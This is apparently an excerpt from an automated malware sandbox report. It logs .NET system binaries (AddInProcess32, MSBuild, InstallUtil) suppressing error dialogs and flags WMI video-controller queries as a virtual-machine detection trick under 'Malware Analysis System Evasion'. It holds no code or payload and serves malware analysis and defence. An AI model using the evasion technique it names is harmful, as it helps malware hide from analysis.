Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
